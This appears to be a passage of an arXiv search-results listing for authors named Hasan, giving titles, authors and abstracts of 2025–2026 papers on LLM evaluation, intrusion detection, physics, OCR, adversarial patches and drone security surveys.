-
Syntax Is Easy, Semantics Is Hard: Evaluating LLMs for LTL Translation
Authors:
Priscilla Kyei Danso,
Mohammad Saqib Hasan,
Niranjan Balasubramanian,
Omar Chowdhury
Abstract:
Propositional Linear Temporal Logic (LTL) is a popular formalism for specifying desirable requirements and security and privacy policies for software, networks, and systems. Yet expressing such requirements and policies in LTL remains challenging because of its intricate semantics. Since many security and privacy analysis tools require LTL formulas as input, this difficulty places them out of reach for many developers and analysts. Large Language Models (LLMs) could broaden access to such tools by translating natural language fragments into LTL formulas. This paper evaluates that premise by assessing how effectively several representative LLMs translate assertive English sentences into LTL formulas. Using both human-generated and synthetic ground-truth data, we evaluate effectiveness along syntactic and semantic dimensions. The results reveal three findings: (1) consistent with prior work, LLMs perform better on syntactic aspects of LTL than on semantic ones; (2) they generally benefit from more detailed prompts; and (3) reformulating the task as a Python code-completion problem substantially improves overall performance. We also discuss challenges in conducting a fair evaluation on this task and conclude with recommendations for future work.
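The code-completion reformulation in finding (3) can be illustrated with a minimal sketch: the natural-language sentence is embedded inside an unfinished Python function so that the LLM completes a returned LTL string. The template, the `to_ltl` helper name, and the operator list are illustrative assumptions, not the paper's actual prompts.

```python
# Hypothetical sketch of recasting NL -> LTL translation as Python code
# completion. Template and names are assumptions, not the paper's prompts.

def build_code_completion_prompt(sentence: str) -> str:
    """Frame the translation task as completing a Python function body,
    so the model emits an LTL formula as the returned string."""
    return (
        "# LTL operators: G (always), F (eventually), X (next), U (until)\n"
        "def to_ltl(sentence: str) -> str:\n"
        f'    """Translate: {sentence}"""\n'
        "    return "
    )

prompt = build_code_completion_prompt(
    "Every request is eventually followed by a grant."
)
print(prompt)
```

The prompt ends mid-statement on purpose: a code-completion model continues from `return `, which constrains it toward a single well-formed formula string.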
Submitted 8 April, 2026;
originally announced April 2026.
-
Attribution-Driven Explainable Intrusion Detection with Encoder-Based Large Language Models
Authors:
Umesh Biswas,
Shafqat Hasan,
Syed Mohammed Farhan,
Nisha Pillai,
Charan Gudla
Abstract:
Software-Defined Networking (SDN) improves network flexibility but also increases the need for reliable and interpretable intrusion detection. Large Language Models (LLMs) have recently been explored for cybersecurity tasks due to their strong representation learning capabilities; however, their lack of transparency limits their practical adoption in security-critical environments. Understanding how LLMs make decisions is therefore essential. This paper presents an attribution-driven analysis of encoder-based LLMs for network intrusion detection using flow-level traffic features. Attribution analysis demonstrates that model decisions are driven by meaningful traffic behavior patterns, improving transparency and trust in transformer-based SDN intrusion detection. These patterns align with established intrusion detection principles, indicating that LLMs learn attack behavior from traffic dynamics. This work demonstrates the value of attribution methods for validating and trusting LLM-based security analysis.
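The attribution idea described above can be sketched with a toy occlusion-style analysis: mask one flow feature at a time and measure how much the model's score drops. The linear stand-in "model", feature names, and weights below are assumptions for illustration; the paper works with encoder-based LLMs, not this toy.

```python
# Toy occlusion-style attribution over flow-level features. The linear
# stand-in model and feature names are illustrative assumptions.

FEATURES = ["duration", "pkt_count", "byte_rate"]
WEIGHTS = [0.1, 0.7, 0.2]  # stand-in for a trained detector


def score(x):
    """Stand-in model output for a flow feature vector."""
    return sum(w * xi for w, xi in zip(WEIGHTS, x))


def occlusion_attributions(x, baseline=0.0):
    """Attribution of feature i = score drop when feature i is masked."""
    base = score(x)
    return {
        name: base - score([baseline if j == i else xj
                            for j, xj in enumerate(x)])
        for i, name in enumerate(FEATURES)
    }

flow = [2.0, 5.0, 1.0]
attr = occlusion_attributions(flow)
print(max(attr, key=attr.get))  # -> pkt_count
```

Gradient-based methods such as Integrated Gradients or SHAP follow the same logic (contribution relative to a baseline) but distribute credit more carefully than simple occlusion.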
Submitted 6 April, 2026;
originally announced April 2026.
-
Phase-space integrals through Mellin-Barnes representation
Authors:
Taushif Ahmed,
Syed Mehedi Hasan,
Andreas Rapakoulias
Abstract:
We compute angular phase-space integrals with three and four denominators analytically, working within dimensional regularisation via the Mellin-Barnes (MB) representation. The approach converts multifold MB integrals into real parametric integrals and expresses all results in terms of Goncharov polylogarithms (GPLs). For three denominators, all-massless results are obtained to $\mathcal{O}(ε^2)$ and the single-massive case to $\mathcal{O}(ε)$; for four denominators, both the massless and single-massive cases are solved to $\mathcal{O}(ε^0)$. Integrals with multiple massive momenta follow from a partial fraction decomposition reducing them to the single-massive case. Recursion relations relating integrals with higher denominator powers to master integrals are derived. These are essential ingredients for solving full phase-space integrals.
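The core of the MB approach is the textbook identity that splits a sum in a denominator into factorized powers at the cost of a contour integral (shown here in its standard form, not necessarily in this paper's specific conventions):

```latex
\frac{1}{(A+B)^{\lambda}}
  \;=\;
\frac{1}{\Gamma(\lambda)}\,\frac{1}{2\pi i}
\int_{-i\infty}^{+i\infty}\!\mathrm{d}z\;
\Gamma(-z)\,\Gamma(\lambda+z)\,\frac{B^{z}}{A^{\lambda+z}}
```

Applying this to each denominator of an angular integral produces the multifold MB representation, after which the angular integration can be done in closed form and the remaining contour integrals converted to the parametric integrals mentioned above.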
Submitted 1 April, 2026;
originally announced April 2026.
-
Simulating cavity QED with spin-orbit coupled Bose-Einstein condensates revisited
Authors:
Muhammad S. Hasan,
Karol Gietka
Abstract:
Simulating cavity quantum electrodynamics in synthetic platforms offers a promising route to exploring light-matter interactions without real photons, while enabling the transfer of cavity-based techniques to other systems. Among such platforms, Bose-Einstein condensates with synthetic spin-orbit coupling provide a controllable setting where internal and motional degrees of freedom become coupled, mimicking aspects of cavity quantum electrodynamics. In this work, we critically assess the extent to which spin-orbit coupled Bose-Einstein condensates can emulate cavity quantum electrodynamics phenomena, with a focus on squeezing and entanglement generation. We show that spin-orbit coupled Bose-Einstein condensates can faithfully reproduce the physics of a single atom coupled to a quantized field, realizing an analogue of the quantum Rabi model, but inherently fail to capture genuine collective effects characteristic of the Dicke model, such as cavity-mediated many-body entanglement. Our results clarify both the potential and the fundamental limitations of spin-orbit coupled Bose-Einstein condensates as analogue quantum simulators of cavity quantum electrodynamics, offering guidance for future strategies to generate and control non-classical states of matter in photon-free, highly tunable platforms.
Submitted 30 March, 2026;
originally announced March 2026.
-
A Multimodal Framework for Human-Multi-Agent Interaction
Authors:
Shaid Hasan,
Breenice Lee,
Sujan Sarker,
Tariq Iqbal
Abstract:
Human-robot interaction is increasingly moving toward multi-robot, socially grounded environments. Existing systems struggle to integrate multimodal perception, embodied expression, and coordinated decision-making in a unified framework. This limits natural and scalable interaction in shared physical spaces. We address this gap by introducing a multimodal framework for human-multi-agent interaction in which each robot operates as an autonomous cognitive agent with integrated multimodal perception and Large Language Model (LLM)-driven planning grounded in embodiment. At the team level, a centralized coordination mechanism regulates turn-taking and agent participation to prevent overlapping speech and conflicting actions. Implemented on two humanoid robots, our framework enables coherent multi-agent interaction through interaction policies that combine speech, gesture, gaze, and locomotion. Representative interaction runs demonstrate coordinated multimodal reasoning across agents and grounded embodied responses. Future work will focus on larger-scale user studies and deeper exploration of socially grounded multi-agent interaction dynamics.
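The centralized turn-taking mechanism described above can be sketched as a simple floor-granting arbiter: agents request the floor and a coordinator grants it to one agent at a time, so speech and actions never overlap. This is a toy stand-in with assumed names, not the paper's implementation.

```python
# Minimal sketch of a centralized turn-taking arbiter; class and method
# names are illustrative assumptions, not the paper's framework API.
from collections import deque


class TurnCoordinator:
    """Grants the floor to one agent at a time, FIFO order."""

    def __init__(self):
        self.queue = deque()
        self.speaking = None

    def request_turn(self, agent: str) -> None:
        self.queue.append(agent)

    def grant_next(self):
        """End the current turn and give the floor to the next requester."""
        self.speaking = self.queue.popleft() if self.queue else None
        return self.speaking

coord = TurnCoordinator()
coord.request_turn("robot_A")
coord.request_turn("robot_B")
print(coord.grant_next())  # -> robot_A
print(coord.grant_next())  # -> robot_B
```

A real coordinator would also arbitrate non-speech resources (gesture, locomotion) and handle preemption, but the single-floor invariant is the core idea.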
Submitted 24 March, 2026;
originally announced March 2026.
-
Privacy Preserving Topic-wise Sentiment Analysis of the Iran Israel USA Conflict Using Federated Transformer Models
Authors:
Md Saiful Islam,
Tanjim Taharat Aurpa,
Sharad Hasan,
Farzana Akter
Abstract:
The recent escalation of the Iran Israel USA conflict in 2026 has triggered widespread global discussions across social media platforms. As people increasingly use these platforms for expressing opinions, analyzing public sentiment from these discussions can provide valuable insights into global public perception. This study aims to analyze global public sentiment regarding the Iran Israel USA conflict by mining user-generated comments from YouTube news channels. The work contributes to public opinion analysis by introducing a privacy-preserving framework that combines topic-wise sentiment analysis with modern deep learning techniques and Federated Learning. To achieve this, approximately 19,000 YouTube comments were collected from major international news channels and preprocessed to remove noise and normalize text. Sentiment labels were initially generated using the VADER sentiment analyzer and later validated through manual inspection to improve reliability. Latent Dirichlet Allocation (LDA) was applied to identify key discussion topics related to the conflict. Several transformer-based models, including BERT, RoBERTa, XLNet, DistilBERT, ModernBERT, and ELECTRA, were fine-tuned for sentiment classification. The best-performing model was further integrated into a federated learning environment to enable distributed training while preserving user data privacy. Additionally, Explainable Artificial Intelligence (XAI) techniques using SHAP were applied to interpret model predictions and identify influential words affecting sentiment classification. Experimental results demonstrate that transformer models perform effectively, and among them, ELECTRA achieved the best performance with 91.32% accuracy. The federated learning setup also maintained strong performance while preserving privacy, achieving 89.59% accuracy in a two-client configuration.
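The federated aggregation step behind the two-client configuration can be sketched with the standard FedAvg rule: average per-client parameters weighted by local data size. The tiny parameter vectors and client sizes below are assumptions for illustration; the actual setup averages transformer weights.

```python
# Minimal FedAvg sketch; the paper's federated setup averages transformer
# weights across clients, the numbers here are illustrative assumptions.

def fed_avg(client_weights, client_sizes):
    """Average per-client parameter vectors, weighted by local data size."""
    total = sum(client_sizes)
    dim = len(client_weights[0])
    return [
        sum(w[i] * n for w, n in zip(client_weights, client_sizes)) / total
        for i in range(dim)
    ]

# Two-client configuration, as in the abstract's experiments.
client_a = [0.25, 0.5]   # parameters after local training on client A
client_b = [0.75, 0.5]   # parameters after local training on client B
global_w = fed_avg([client_a, client_b], client_sizes=[100, 300])
print(global_w)  # -> [0.625, 0.5]
```

Raw comments never leave a client; only these parameter updates are shared, which is what makes the framework privacy-preserving.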
Submitted 13 March, 2026;
originally announced March 2026.
-
A Robust Deep Learning Framework for Bangla License Plate Recognition Using YOLO and Vision-Language OCR
Authors:
Nayeb Hasin,
Md. Arafath Rahman Nishat,
Mainul Islam,
Khandakar Shakib Al Hasan,
Asif Newaz
Abstract:
An Automatic License Plate Recognition (ALPR) system constitutes a crucial element in an intelligent traffic management system. However, the detection of Bangla license plates remains challenging because of the complicated character scheme and uneven layouts. This paper presents a robust Bangla License Plate Recognition system that integrates a deep learning-based object detection model for license plate localization with Optical Character Recognition for text extraction. Multiple object detection architectures, including U-Net and several YOLO (You Only Look Once) variants, are compared for license plate localization. This study proposes a novel two-stage adaptive training strategy built upon the YOLOv8 architecture to improve localization performance. The proposed approach outperforms the established models, achieving an accuracy of 97.83% and an Intersection over Union (IoU) of 91.3%. The text recognition problem is formulated as a sequence generation problem with a VisionEncoderDecoder architecture, with several encoder-decoder combinations evaluated. Among these, the ViT + BanglaBERT model gives the best results at the character level, with a Character Error Rate of 0.1323 and a Word Error Rate of 0.1068. The proposed system also shows consistent performance when tested on an external dataset curated for the purposes of this study. The dataset offers completely different environmental and lighting conditions compared to the training sample, indicating the robustness of the proposed framework. Overall, our proposed system provides a robust and reliable solution for Bangla license plate recognition and performs effectively across diverse real-world scenarios, including variations in lighting, noise, and plate styles. These strengths make it well suited for deployment in intelligent transportation applications such as automated law enforcement and access control.
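The Character Error Rate used to score the OCR stage is edit distance between the predicted and reference strings, normalized by the reference length. A generic sketch (not the paper's evaluation code):

```python
# Character Error Rate (CER): Levenshtein edit distance between prediction
# and reference, divided by reference length. Generic sketch.

def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance via row-by-row dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(
                prev[j] + 1,                 # deletion
                cur[j - 1] + 1,              # insertion
                prev[j - 1] + (ca != cb),    # substitution (0 if match)
            ))
        prev = cur
    return prev[-1]


def cer(prediction: str, reference: str) -> float:
    return edit_distance(prediction, reference) / len(reference)

print(cer("kitten", "sitting"))  # 3 edits over 7 reference characters
```

Word Error Rate is the same computation with word tokens in place of characters, which is why the two scores can differ on the same output.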
Submitted 10 March, 2026;
originally announced March 2026.
-
TimeSpot: Benchmarking Geo-Temporal Understanding in Vision-Language Models in Real-World Settings
Authors:
Azmine Toushik Wasi,
Shahriyar Zaman Ridoy,
Koushik Ahamed Tonmoy,
Kinga Tshering,
S. M. Muhtasimul Hasan,
Wahid Faisal,
Tasnim Mohiuddin,
Md Rizwan Parvez
Abstract:
Geo-temporal understanding, the ability to infer location, time, and contextual properties from visual input alone, underpins applications such as disaster management, traffic planning, embodied navigation, world modeling, and geography education. Although recent vision-language models (VLMs) have advanced image geo-localization using cues like landmarks and road signs, their ability to reason about temporal signals and physically grounded spatial cues remains limited. To address this gap, we introduce TimeSpot, a benchmark for evaluating real-world geo-temporal reasoning in VLMs. TimeSpot comprises 1,455 ground-level images from 80 countries and requires structured prediction of temporal attributes (season, month, time of day, daylight phase) and geographic attributes (continent, country, climate zone, environment type, latitude-longitude) directly from visual evidence. It also includes spatial-temporal reasoning tasks that test physical plausibility under real-world uncertainty. Evaluations of state-of-the-art open- and closed-source VLMs show low performance, particularly for temporal inference. While supervised fine-tuning yields improvements, results remain insufficient, highlighting the need for new methods to achieve robust, physically grounded geo-temporal understanding. TimeSpot is available at: https://TimeSpot-GT.github.io.
Submitted 4 March, 2026;
originally announced March 2026.
-
Physical Evaluation of Naturalistic Adversarial Patches for Camera-Based Traffic-Sign Detection
Authors:
Brianna D'Urso,
Tahmid Hasan Sakib,
Syed Rafay Hasan,
Terry N. Guo
Abstract:
This paper studies how well Naturalistic Adversarial Patches (NAPs) transfer to a physical traffic sign setting when the detector is trained on a customized dataset for an autonomous vehicle (AV) environment. We construct this composite dataset, CompGTSRB, by pasting traffic sign instances from the German Traffic Sign Recognition Benchmark (GTSRB) onto undistorted backgrounds captured from the target platform. CompGTSRB is used to train a YOLOv5 model and generate patches using a Generative Adversarial Network (GAN) with latent space optimization, following existing NAP methods. We carried out a series of experiments on our Quanser QCar testbed utilizing the front CSI camera provided in the QCar. Across configurations, which vary distance, patch size, and patch placement, NAPs reduce the detector's STOP-class confidence. These results, along with a detailed step-by-step methodology, indicate the utility of the CompGTSRB dataset and the proposed systematic physical protocols for credible patch evaluation. The findings further motivate research into defenses that address localized patch corruption in embedded perception pipelines.
Submitted 27 February, 2026;
originally announced March 2026.
-
Make It Hard to Hear, Easy to Learn: Long-Form Bengali ASR and Speaker Diarization via Extreme Augmentation and Perfect Alignment
Authors:
Sanjid Hasan,
Risalat Labib,
A H M Fuad,
Bayazid Hasan
Abstract:
Although Automatic Speech Recognition (ASR) in Bengali has seen significant progress, processing long-duration audio and performing robust speaker diarization remain critical research gaps. To address the severe scarcity of joint ASR and diarization resources for this language, we introduce Lipi-Ghor-882, a comprehensive 882-hour multi-speaker Bengali dataset. In this paper, which details our submission to the DL Sprint 4.0 competition, we systematically evaluate various architectures and approaches for long-form Bengali speech. For ASR, we demonstrate that raw data scaling is ineffective; instead, targeted fine-tuning utilizing perfectly aligned annotations paired with synthetic acoustic degradation (noise and reverberation) emerges as the single most effective approach. Conversely, for speaker diarization, we observed that global open-source state-of-the-art models (such as Diarizen) performed surprisingly poorly on this complex dataset. Extensive model retraining yielded negligible improvements; instead, strategic, heuristic post-processing of baseline model outputs proved to be the primary driver for increasing accuracy. Ultimately, this work outlines a highly optimized dual pipeline achieving a $\sim$0.019 Real-Time Factor (RTF), establishing a practical, empirically backed benchmark for low-resource, long-form speech processing.
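The Real-Time Factor metric quoted above is simply processing time divided by audio duration, so an RTF of ~0.019 means an hour of audio is processed in roughly 68 seconds. The concrete timing numbers below are illustrative assumptions:

```python
# Real-Time Factor (RTF): processing time / audio duration. Values below
# are illustrative assumptions consistent with the reported ~0.019.

def real_time_factor(processing_seconds: float, audio_seconds: float) -> float:
    """RTF < 1 means faster than real time."""
    return processing_seconds / audio_seconds

rtf = real_time_factor(processing_seconds=68.4, audio_seconds=3600.0)
print(round(rtf, 3))  # -> 0.019
```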
Submitted 26 February, 2026;
originally announced February 2026.
-
The Quiet Contributions: Insights into AI-Generated Silent Pull Requests
Authors:
S M Mahedy Hasan,
Md Fazle Rabbi,
Minhaz Zibran
Abstract:
We present the first empirical study of AI-generated pull requests that are 'silent,' meaning no comments or discussions accompany them. The absence of any comments or discussions associated with such silent AI pull requests (SPRs) poses a unique challenge in understanding the rationale for their acceptance or rejection. Hence, we quantitatively study 4,762 SPRs made by five AI agents to popular Python repositories drawn from the AIDev public dataset. We examine the SPRs' impact on code complexity, other quality issues, and security vulnerabilities, especially to determine whether these insights can hint at the rationale for acceptance or rejection of SPRs.
Submitted 28 January, 2026;
originally announced January 2026.
-
Teaching and Evaluating LLMs to Reason About Polymer Design Related Tasks
Authors:
Dikshya Mohanty,
Mohammad Saqib Hasan,
Syed Mostofa Monsur,
Size Zheng,
Benjamin Hsiao,
Niranjan Balasubramanian
Abstract:
Research in AI4Science has shown promise in many science applications, including polymer design. However, current LLMs prove ineffective in this problem space because: (i) most models lack polymer-specific knowledge, and (ii) existing aligned models lack coverage of knowledge and capabilities relevant to polymer design. Addressing this, we introduce PolyBench, a large-scale training and test benchmark dataset of more than 125K polymer design related tasks, leveraging a knowledge base of 13M+ data points obtained from experimental and synthetic sources to ensure broad coverage of polymers and their properties. For effective alignment using PolyBench, we introduce a knowledge-augmented reasoning distillation method that augments this dataset with structured CoT. Furthermore, tasks in PolyBench are organized from simple to complex analytical reasoning problems, enabling generalization tests and diagnostic probes across the problem space. Experiments show that small language models (SLMs) of 7B to 14B parameters trained on PolyBench data outperform similarly sized models, and even closed-source frontier LLMs, on the PolyBench test dataset, while demonstrating gains on other polymer benchmarks as well.
Submitted 22 January, 2026;
originally announced January 2026.
-
A Survey of Security Challenges and Solutions for Advanced Air Mobility and eVTOL Aircraft
Authors:
Mahyar Ghazanfari,
Iman Sharifi,
Peng Wei,
Noah Dahle,
Abel Diaz Gonzalez,
Austin Coursey,
Bryce Bjorkman,
Cailani Lemieux-Mack,
Robert Canady,
Abenezer Taye,
Bryan C. Ward,
Xenofon Koutsoukos,
Gautam Biswas,
Maheed H. Ahmed,
Hyeong Tae Kim,
Mahsa Ghasemi,
Vijay Gupta,
Filippos Fotiadis,
Ufuk Topcu,
Junchi Lu,
Alfred Chen,
Abdul Kareem Ras,
Nischal Aryal,
Amer Ibrahim,
Amir Shirkhodaie
, et al. (3 additional authors not shown)
Abstract:
This survey reviews the existing and envisioned security vulnerabilities and defense mechanisms relevant to Advanced Air Mobility (AAM) systems, with a focus on electric vertical takeoff and landing (eVTOL) aircraft. Drawing from vulnerabilities in commercial-aviation avionics and automated unmanned aerial systems (UAS), the paper presents a taxonomy of attacks, analyzes mitigation strategies, and proposes a secure system architecture tailored to the future AAM ecosystem. The paper also highlights key threat vectors, including Global Positioning System (GPS) jamming/spoofing, ATC radio frequency misuse, attacks on TCAS and ADS-B, possible backdoors via the Electronic Flight Bag (EFB), new vulnerabilities introduced by aircraft automation and connectivity, and risks from flight management system (FMS) software, databases, and cloud services. Finally, this paper describes emerging defense techniques against these attacks, and open technical problems to address toward better defense mechanisms.
Submitted 20 January, 2026;
originally announced January 2026.
-
A Survey of Security Challenges and Solutions for UAS Traffic Management (UTM) and small Unmanned Aerial Systems (sUAS)
Authors:
Iman Sharifi,
Mahyar Ghazanfari,
Abenezer Taye,
Peng Wei,
Maheed H. Ahmed,
Hyeong Tae Kim,
Mahsa Ghasemi,
Vijay Gupta,
Noah Dahle,
Robert Canady,
Abel Diaz Gonzalez,
Austin Coursey,
Bryce Bjorkman,
Cailani Lemieux-Mack,
Bryan C. Ward,
Xenofon Koutsoukos,
Gautam Biswas,
Heber Herencia-Zapana,
Saqib Hasan,
Isaac Amundson,
Filippos Fotiadis,
Ufuk Topcu,
Junchi Lu,
Qi Alfred Chen,
Nischal Aryal
, et al. (3 additional authors not shown)
Abstract:
The rapid growth of small Unmanned Aerial Systems (sUAS) for civil and commercial missions has intensified concerns about their resilience to cyber-security threats. Operating within the emerging UAS Traffic Management (UTM) framework, these lightweight and highly networked platforms depend on secure communication, navigation, and surveillance (CNS) subsystems that are vulnerable to spoofing, jamming, hijacking, and data manipulation. While prior reviews of UAS security addressed these challenges at a conceptual level, a detailed, system-oriented analysis for resource-constrained sUAS remains lacking. This paper presents a comprehensive survey of cyber-security vulnerabilities and defenses tailored to the sUAS and UTM ecosystem. We organize existing research across the full cyber-physical stack, encompassing CNS, data links, sensing and perception, UTM cloud access, and software integrity layers, and classify attack vectors according to their technical targets and operational impacts. Correspondingly, we review defense mechanisms ranging from classical encryption and authentication to adaptive intrusion detection, lightweight cryptography, and secure firmware management. By mapping threats to mitigation strategies and evaluating their scalability and practical effectiveness, this work establishes a unified taxonomy and identifies open challenges for achieving safe, secure, and scalable sUAS operations within future UTM environments.
Submitted 13 January, 2026;
originally announced January 2026.
-
Reinforcement Learning-Guided Dynamic Multi-Graph Fusion for Evacuation Traffic Prediction
Authors:
Md Nafees Fuad Rafi,
Samiul Hasan
Abstract:
Real-time traffic prediction is critical for managing transportation systems during hurricane evacuations. Although data-driven graph-learning models have demonstrated strong capabilities in capturing the complex spatiotemporal dynamics of evacuation traffic at a network level, they mostly consider a single dimension (e.g., travel-time or distance) to construct the underlying graph. Furthermore, these models often lack interpretability, offering little insight into which input variables contribute most to their predictive performance. To overcome these limitations, we develop a novel Reinforcement Learning-guided Dynamic Multi-Graph Fusion (RL-DMF) framework for evacuation traffic prediction. We construct multiple dynamic graphs at each time step to represent heterogeneous spatiotemporal relationships between traffic detectors. A dynamic multi-graph fusion (DMF) module is employed to adaptively learn and combine information from these graphs. To enhance model interpretability, we introduce an RL-based intelligent feature selection and ranking (RL-IFSR) method that learns to mask irrelevant features during model training. The model is evaluated using a real-world dataset of 12 hurricanes affecting Florida from 2016 to 2024. For an unseen hurricane (Milton, 2024), the model achieves 95% accuracy (RMSE = 293.9) for predicting the next 1-hour traffic flow. Moreover, the model can forecast traffic flow for up to the next 6 hours with 90% accuracy (RMSE = 426.4). The RL-DMF framework outperforms several state-of-the-art traffic prediction models. Furthermore, ablation experiments confirm the effectiveness of dynamic multi-graph fusion and RL-IFSR approaches for improving model performance. This research provides a generalized and interpretable model for real-time evacuation traffic forecasting, with significant implications for evacuation traffic management.
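The fusion step can be sketched as a weighted combination of adjacency matrices built from different relationships (e.g., distance vs. travel time). In the actual DMF module the weights are learned and change per time step; the fixed weights and tiny two-node graphs below are illustrative assumptions.

```python
# Sketch of fusing multiple graph adjacencies with weights; in the DMF
# module the weights are learned per time step, here they are fixed
# assumptions for illustration.

def fuse_graphs(adjacencies, weights):
    """Weighted sum of adjacency matrices over the same node set."""
    n = len(adjacencies[0])
    return [
        [sum(w * A[i][j] for A, w in zip(adjacencies, weights))
         for j in range(n)]
        for i in range(n)
    ]

distance_graph    = [[0.0, 1.0], [1.0, 0.0]]   # edge weights from distance
travel_time_graph = [[0.0, 0.5], [0.5, 0.0]]   # edge weights from travel time
fused = fuse_graphs([distance_graph, travel_time_graph],
                    weights=[0.75, 0.25])
print(fused)  # -> [[0.0, 0.875], [0.875, 0.0]]
```

The fused matrix then feeds the downstream graph-learning layers, letting one model draw on several notions of detector proximity at once.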
Submitted 10 January, 2026;
originally announced January 2026.
-
A Dual Pipeline Machine Learning Framework for Automated Multi Class Sleep Disorder Screening Using Hybrid Resampling and Ensemble Learning
Authors:
Md Sultanul Islam Ovi,
Muhsina Tarannum Munfa,
G. M. M Miftahul Alam Adib,
Syed Sabbir Hasan
Abstract:
Accurate classification of sleep disorders, particularly insomnia and sleep apnea, is important for reducing long-term health risks and improving patient quality of life. However, clinical sleep studies are resource-intensive and difficult to scale for population-level screening. This paper presents a Dual Pipeline Machine Learning Framework for multi-class sleep disorder screening using the Sleep Health and Lifestyle dataset. The framework consists of two parallel processing streams: a statistical pipeline that targets linear separability using Mutual Information and Linear Discriminant Analysis, and a wrapper-based pipeline that applies Boruta feature selection with an autoencoder for non-linear representation learning. To address class imbalance, we use the hybrid SMOTETomek resampling strategy. In experiments, Extra Trees and K-Nearest Neighbors achieved an accuracy of 98.67%, outperforming recent baselines on the same dataset. Statistical testing using the Wilcoxon Signed-Rank Test indicates that the improvement over baseline configurations is significant, and inference latency remains below 400 milliseconds. These results suggest that the proposed dual-pipeline design supports accurate and efficient automated screening for non-invasive sleep disorder risk stratification.
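The oversampling half of SMOTETomek can be sketched in a few lines: SMOTE synthesizes minority-class points by interpolating between a sample and one of its minority-class neighbors. The Tomek-link cleanup that follows in the hybrid strategy is omitted here, and the points and RNG seed are illustrative assumptions.

```python
# Minimal SMOTE-style oversampling sketch (interpolation step only; the
# Tomek-link removal of SMOTETomek is omitted). Values are illustrative.
import random


def smote_sample(x, neighbor, rng):
    """Synthesize a point on the segment between x and a minority neighbor."""
    gap = rng.random()  # uniform in [0, 1)
    return [xi + gap * (ni - xi) for xi, ni in zip(x, neighbor)]

rng = random.Random(0)
minority_point   = [1.0, 2.0]
nearest_neighbor = [3.0, 4.0]
synthetic = smote_sample(minority_point, nearest_neighbor, rng)
print(synthetic)  # lies between the two points, component-wise
```

Because synthetic points sit on segments inside the minority region rather than duplicating existing samples, the rebalanced training set is less prone to overfitting than plain random oversampling.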
△ Less
Submitted 6 February, 2026; v1 submitted 9 January, 2026;
originally announced January 2026.
-
CircuitLM: A Multi-Agent LLM-Aided Design Framework for Generating Circuit Schematics from Natural Language Prompts
Authors:
Khandakar Shakib Al Hasan,
Syed Rifat Raiyan,
Hasin Mahtab Alvee,
Wahid Sadik
Abstract:
Generating accurate circuit schematics from high-level natural language descriptions remains a persistent challenge in electronic design automation (EDA), as large language models (LLMs) frequently hallucinate components, violate strict physical constraints, and produce non-machine-readable outputs. To address this, we present CircuitLM, a multi-agent pipeline that translates user prompts into str…
▽ More
Generating accurate circuit schematics from high-level natural language descriptions remains a persistent challenge in electronic design automation (EDA), as large language models (LLMs) frequently hallucinate components, violate strict physical constraints, and produce non-machine-readable outputs. To address this, we present CircuitLM, a multi-agent pipeline that translates user prompts into structured, visually interpretable $\texttt{CircuitJSON}$ schematics. The framework mitigates hallucination and ensures physical viability by grounding generation in a curated, embedding-powered component knowledge base through five sequential stages: (i) component identification, (ii) canonical pinout retrieval, (iii) chain-of-thought reasoning, (iv) JSON schematic synthesis, and (v) interactive force-directed visualization. We evaluate the system on a dataset of 100 unique circuit-design prompts using five state-of-the-art LLMs. To systematically assess performance, we deploy a rigorous dual-layered evaluation methodology: a deterministic Electrical Rule Checking (ERC) engine categorizes topological faults by strict severity (Critical, Major, Minor, Warning), while an LLM-as-a-judge meta-evaluator identifies complex, context-aware design flaws that bypass standard rule-based checkers. Ultimately, this work demonstrates how targeted retrieval combined with deterministic and semantic verification can bridge natural language to structurally viable, schematic-ready hardware and safe circuit prototyping. Our code and data will be made public.
△ Less
Submitted 17 March, 2026; v1 submitted 7 January, 2026;
originally announced January 2026.
-
Generalization Gaps in Political Fake News Detection: An Empirical Study on the LIAR Dataset
Authors:
S Mahmudul Hasan,
Shaily Roy,
Akib Jawad Nafis
Abstract:
The proliferation of linguistically subtle political disinformation poses a significant challenge to automated fact-checking systems. Despite increasing emphasis on complex neural architectures, the empirical limits of text-only linguistic modeling remain underexplored. We present a systematic diagnostic evaluation of nine machine learning algorithms on the LIAR benchmark. By isolating lexical fea…
▽ More
The proliferation of linguistically subtle political disinformation poses a significant challenge to automated fact-checking systems. Despite increasing emphasis on complex neural architectures, the empirical limits of text-only linguistic modeling remain underexplored. We present a systematic diagnostic evaluation of nine machine learning algorithms on the LIAR benchmark. By isolating lexical features (Bag-of-Words, TF-IDF) and semantic embeddings (GloVe), we uncover a hard "Performance Ceiling", with fine-grained classification not exceeding a Weighted F1-score of 0.32 across models. Crucially, a simple linear SVM (Accuracy: 0.624) matches the performance of pre-trained Transformers such as RoBERTa (Accuracy: 0.620), suggesting that model capacity is not the primary bottleneck. We further diagnose a massive "Generalization Gap" in tree-based ensembles, which achieve more than 99% training accuracy but collapse to approximately 25% on test data, indicating reliance on lexical memorization rather than semantic inference. Synthetic data augmentation via SMOTE yields no meaningful gains, confirming that the limitation is semantic (feature ambiguity) rather than distributional. These findings indicate that for political fact-checking, increasing model complexity without incorporating external knowledge yields diminishing returns.
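The lexical feature isolation described above can be illustrated with a minimal TF-IDF computation, a pure-Python sketch on hypothetical toy documents (the study itself would use standard library implementations):

```python
import math
from collections import Counter

def tfidf(docs):
    """Minimal TF-IDF: term frequency scaled by inverse document frequency.
    Terms present in every document receive zero weight."""
    n = len(docs)
    tokenized = [d.lower().split() for d in docs]
    df = Counter(t for doc in tokenized for t in set(doc))
    vectors = []
    for doc in tokenized:
        tf = Counter(doc)
        vectors.append({t: (c / len(doc)) * math.log(n / df[t])
                        for t, c in tf.items()})
    return vectors

docs = ["the budget claim is false",
        "the budget claim is true",
        "the taxes rose last year"]
vecs = tfidf(docs)
print(vecs[0]["the"], vecs[0]["false"] > vecs[0]["budget"])
```

Note how a term shared by all documents ("the") is weighted to zero while rarer, claim-specific terms dominate; purely lexical weighting of this kind is exactly what hits the semantic ceiling the study reports.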
△ Less
Submitted 20 December, 2025;
originally announced December 2025.
-
Prompt Searches for Very-High-Energy γ-Ray Counterparts to IceCube Astrophysical Neutrino Alerts
Authors:
J. Abhir,
A. Biland,
K. Brand,
T. Bretz,
D. Dorner,
L. Eisenberger,
D. Elsaesser,
P. Günther,
S. Hasan,
D. Hildebrand,
K. Mannheim,
M. Linhoff,
F. Pfeifle,
W. Rhode,
B. Schleicher,
V. Sliusar,
M. Vorbrugg,
R. Walter,
